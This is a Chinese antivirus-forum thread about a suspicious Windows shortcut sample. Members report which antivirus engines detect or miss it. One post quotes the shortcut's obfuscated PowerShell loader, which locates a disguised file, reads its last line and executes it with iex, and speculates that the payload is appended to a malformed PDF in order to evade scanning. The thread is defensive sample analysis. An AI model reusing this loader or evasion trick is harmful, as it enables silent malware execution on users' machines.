搜索
楼主: swizzer
收起左侧

[可疑文件] suspicious lnk.2

[复制链接]
swizzer
 楼主| 发表于 2019-7-22 17:14:25 | 显示全部楼层
llcy 发表于 2019-7-22 17:11
文件: schtasks.exe (CL.Downloader!gen108)

诺顿?
llcy
发表于 2019-7-22 17:22:18 | 显示全部楼层
ATP_synthase
发表于 2019-7-22 19:03:44 | 显示全部楼层
拒绝访问
无法访问该网页

对象网址:

http://att.kafan.cn/forum.php?mo ... DN8MjE1NTE2Mw%3D%3D
原因: 对象被感染 Trojan.Multi.GenAutorunLnkFile.a

消息生成时间: 2019/7/22 19:03:33
Jerry.Lin
发表于 2019-7-22 19:19:59 | 显示全部楼层
GD (BD ENGINE ONLY) SCAN MISS
jdsh
发表于 2019-7-22 19:41:58 | 显示全部楼层
Emsisoft Anti-Malware   
comunicazione clientela运行后拦截衍生物





本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
椿花湫月
发表于 2019-7-22 21:46:56 | 显示全部楼层
本帖最后由 椿花湫月 于 2019-7-22 21:51 编辑

发错了,编辑掉
椿花湫月
发表于 2019-7-22 21:49:53 | 显示全部楼层
本帖最后由 椿花湫月 于 2019-7-22 21:53 编辑

Trendmicro Housecall miss
mbam miss

Avira miss
B100D1E55
发表于 2019-7-22 22:39:26 | 显示全部楼层
本帖最后由 B100D1E55 于 2019-7-22 22:42 编辑

cd %public:~-15,9%;$m=ls -force -r -in comu*.*|select -last 1;$m=gc -LiteralPath $m|select -last 1;iex $m

所以嘞?最后这个
echo $m
选了畸形pdf的那个hrtynf字串?这总不会是什么实验样品吧……
比如把一个powershell script append到pdf末尾然后用这个快捷方式select然后iex,不过这样还是要过AMSI吧,顶多扫不出来
www-tekeze
发表于 2019-7-23 08:18:32 | 显示全部楼层
来晚了,智量已入库,火绒miss,有空双击。。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛|卡饭乐购| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 苏ICP备07004770号 ) GMT+8, 2019-9-18 01:11 , Processed in 0.038243 second(s), 5 queries , MemCache On.

快速回复 返回顶部 返回列表